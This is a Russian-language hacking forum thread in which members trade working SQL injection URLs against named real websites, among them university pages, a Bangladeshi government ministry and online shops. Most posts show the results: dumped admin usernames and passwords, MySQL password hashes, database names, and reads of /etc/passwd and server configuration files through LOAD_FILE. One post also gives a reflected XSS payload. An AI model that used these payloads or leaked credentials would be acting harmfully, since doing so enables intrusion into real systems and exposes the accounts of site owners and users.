SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Еще один -)
    Code:
    http://collectorsassemble.com/key.php?page_id=-1%20union%20select%20concat(owner_id,0x3a,owner,0x3a,owner_full,0x3a,username,0x3a,password),2,3%20from%20owner%20limit%201,1--
    Хрен поймешь куда эти логины и пароли, рега без паса в таблице customer вроде..
     
  2. recfrf

    recfrf Member

    Joined:
    22 Aug 2008
    Messages:
    21
    Likes Received:
    6
    Reputations:
    0
    pr6
    Code:
    http://www.devicelink.com/products/prods.php?ProdsID=-1561+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
    4.0.23-standard-log
     
  3. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Программистам


    Software Programming Components Warehouse !


    Database Version: 5.0.67-community-log
    Database name: sharewar_cookcode
    User name: sharewar_june@localhost

    Ишем админов вендоров селлеров




    Fields isadmin:isvendor:isreseller:email:password



    1:1:1:[email protected] : d4524322453ffdc5a5b9be7197d20bb3
    0:1:0:[email protected] : ec72e3ac7a2bd7952620d8bbc44da693
    0:1:0:[email protected] : 0c8054c65786089a9f58e97d26c60272
    0:1:0:[email protected] : be5d7fad6cb22911f7dacb0e1a82a827
    0:1:0:[email protected] : 4c4e7fa2e7efff845aae5009d51adb6f
    0:0:0:[email protected] : d93a5def7511da3d0f2d171d9c344e91
     
    1 person likes this.
  4. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    http://www.xpresstrading.nl/verkoop/productdetail.php?product_id=168&category_id=-34%20union%20select%201,2,concat_ws(0x3a,admin_id,admin_login,admin_pass,admin_email),4%20from%20admin--
    admin_id,admin_login,admin_pass,admin_email
    2:admin:rob:[email protected]
     
  5. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    Вот вчера ночью совершил набеги на сайты rin.ru

    юзер - [email protected]
    бд - news
    версия mysql - 4.1.20

    юзер - [email protected]
    бд - persona
    версия mysql - 4.1.20


    юзер - [email protected]
    бд - tests
    версия mysql - 4.1.22-log


    юзер - [email protected]
    бд - map
    версия mysql - 4.1.22-log


    юзер - [email protected]
    бд - lib
    версия mysql - 4.1.22-log


    юзер - [email protected]
    бд - zakon
    версия mysql - 4.1.20


    юзер - [email protected]
    бд - wallpapers
    версия mysql - 4.1.20


    user - [email protected]
    бд - topgun
    версия mysql - 4.1.22-log


    юзер - [email protected]
    бд - russians1
    версия mysql - 4.1.22-log
     
    1 person likes this.
  6. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    http://www.discoverytravel.ru/next.php?pid=-1337  union select table_name  from information_schema.columns where table_name --
    Code:
    http://www.sport-gym.ru/next.php?pid=-3%20union%20select%20group_concat(table_name),2%20from%20information_schema.tables--
     
    #7546 Assembler, 2 Feb 2009
    Last edited by a moderator: 2 Feb 2009
  7. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    Code:
    http://kazan.ws/cgi-bin/people/print.pl?action=sub&id_sub=-67+union+select+1,2,3,4,concat_ws(0x26,user(),database(),version(),LOAD_FILE('/etc/passwd')),6,7,8,9,10,11,12,13,14--&id_razdel=7&wh=razd
     
    #7547 pinky07, 2 Feb 2009
    Last edited by a moderator: 2 Feb 2009
  8. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    http://elv.ee/next.php?lang=2&id=-5%20union%20select%201,version(),3,4,5,6%20--
    
    Code:
    http://www.volier.ru/l2.php?n=-1%20union%20select%201,2,version(),4--
     
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    http://www.hotel-cota1400.ro/render.php?page=100'+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),Database(),User()),0x71),0x71),2,3,4,5,6,7/*

    Version: 4.1.22-standard-log
    Databse: hotelco_public
    User: hotelco_cota1400@localhost
     
    1 person likes this.
  10. NigHT_0WL

    NigHT_0WL Member

    Joined:
    28 Jan 2009
    Messages:
    32
    Likes Received:
    7
    Reputations:
    0
    Code:
    http://elv.ee/next.php?lang=2&id=-5%20union%20select%201,version(),3,4,5,6%20--
    
    user: d7775sa9187
    host: z132.zone.ee
    version: 5.0.67-log
    db: d7775sd5376


    Code:
    http://www.volier.ru/l2.php?n=-1%20union%20select%201,2,version(),4--
    vesion: 4.1.20
    user:volierru@localhost
    db:volierru
     
    1 person likes this.
  11. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.eimearquinn.com/shop.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,Num,Username,Password),7,8,9,10,11,12,13,14+from+admin_eq--
    логин/пасс:
    Code:
    eimearquinn:ei989uin_eq
    Так же пасивная XSS через скуль:

    Code:
    http://www.eimearquinn.com/shop.php?id=-1+union+select+1,2,3,4,5,<script>alert()</script>,7,8,9,10,11,12,13,14+from+admin_eq--
    -----------------------------------------------
    The End!
     
    2 people like this.
  12. hackmen

    hackmen Banned

    Joined:
    22 Oct 2007
    Messages:
    110
    Likes Received:
    46
    Reputations:
    1
    PR 7

    http://ed.stanford.edu/suse/faculty/displayFacultyNews.php?tablename=notify1&id=-833+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.columns+where+table_name=(0x75736572)+limit+3,1--
     
    1 person likes this.
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    914
    Reputations:
    363
    PR: 5
    Code:
    http://www.chicagoloopalliance.com/about.php?id=-193+union+select+1,2/*
    PR: 3
    Code:
    http://www.kss-windows.com/next.php?id=-22+union+select+1,2/*
     
    _________________________
    #7553 yarbabin, 2 Feb 2009
    Last edited by a moderator: 2 Feb 2009
    2 people like this.
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    PR1

    http://www.hqcomputers.ro/produs_detalii.php?id_produs=-829+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,0,1,2,3,4,5,6/*&nume_produs=Imprimanta%20HP%20Color%20Laserjet%202605

    Database Version: 4.1.22-standard-log
    Database name: hqcomputers_ro_bdmag
    User name: 11255hqc@localhost


    админка
    http://hqcomputers.ro/admin/login.php

    табелки не подбирал.
     
    #7554 Gorev, 2 Feb 2009
    Last edited: 2 Feb 2009
  15. hackmen

    hackmen Banned

    Joined:
    22 Oct 2007
    Messages:
    110
    Likes Received:
    46
    Reputations:
    1
    Pr 6
    http://www.lib.odu.edu/libassist/guide/guide.php?id=-44+union+select+1,2,version(),4,5,6,7,8,9--
    5.0.38-Ubuntu_0ubuntu1.4-log
     
  16. Maestus

    Maestus Member

    Joined:
    19 Jan 2009
    Messages:
    8
    Likes Received:
    14
    Reputations:
    3
    Ministry of Chittagong Hill Tracts Affairs


    [admin panel] http://www.mochta.gov.bd/adminfiles/index.php
    username: admin
    password: mo7bu53

    Database version: 5.0.67-community
    Database name: mochtag_cht
    User name: mochtag_root@localhost
     
  17. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,518
    Likes Received:
    401
    Reputations:
    196
    PR6

    Ни админки, ни путей я не нашел, походу база данных и веб сервер на разных хостах находятся.. или хз чо..
    Если что у кого выйдет - отпишись в личку хотя бы)
     
  18. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    HTML:
    http://www.yourprops.com/view_item.php?movie_prop=5179879820+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17--

    Database Version: 5.0.27
    Database name: yourprops
    User name: admin@localhost


    HTML:
    http://www.yourprops.com/view_item.php?movie_prop=5179879820+union+select+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user+limit+0,1--
    admin : 6632bfb46db6d97e
    pma_IiabUsiU1n6q : 6c4572a01bdfb70d
    horde : 039b58f6547b38c2
    pma_g5Dqcuu61ikC : 60fb772f4a1fa923
    pma_AVMLiZ09j6Cb : 05e06de46f9baae2
    yourprops : 6632bfb46db6d97e


    Читаем /etc/httpd/cpnf/httpd.conf


    HTML:
    http://www.yourprops.com/view_item.php?movie_prop=5179879820+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x2F6574632F68747470642F636F6E662F68747470642E636F6E66),0x3a),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17--




    PageRank 7


    Database Version: 5.0.45
    Database name: wwwnews
    User name: njsl_guest@localhost

    Админчег


    : 1 : rcampbell : d00key : all



    PageRank 7


    Version:5.0.45
    User:wsusr@localhost
    Database:roamsecure



    Database Version: 5.0.21-community-nt
    Database name: henhouse
    User name: chicken@localhost

    Админ


    admin : password


    4.1.22
    found412@localhost
    found412_com



    Version:4.1.22-log
    User:etd_edit@localhost
    Database:etd
     
    #7558 spherics, 3 Feb 2009
    Last edited: 3 Feb 2009
    3 people like this.
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    http://www.miracol.ro/carte.php?carte=-99+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3--&titlu=Autoinstruire%20in%20parapsihologie


    Version: 5.0.67-community-log
    Database: :miracol_miracol
    User :miracol_miracol@localhost
     
  20. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    PageRank 6

    Database Version: 4.1.20
    Database name: gorilla
    User name: gorillaf_db@localhost


    admin:7616b862045281be хэш MySQL:7616b862045281be: *test1234
    pma_KOSkwHg4RA6O:5685eb1e1d67adf1
    horde:6651c48b35b24923
    jeff:413a5fe87cbf1d47
    gorillaf_db:0dabc23b146d3b17 хэш MySQL:0dabc23b146d3b17: digit
     
Thread Status:
Not open for further replies.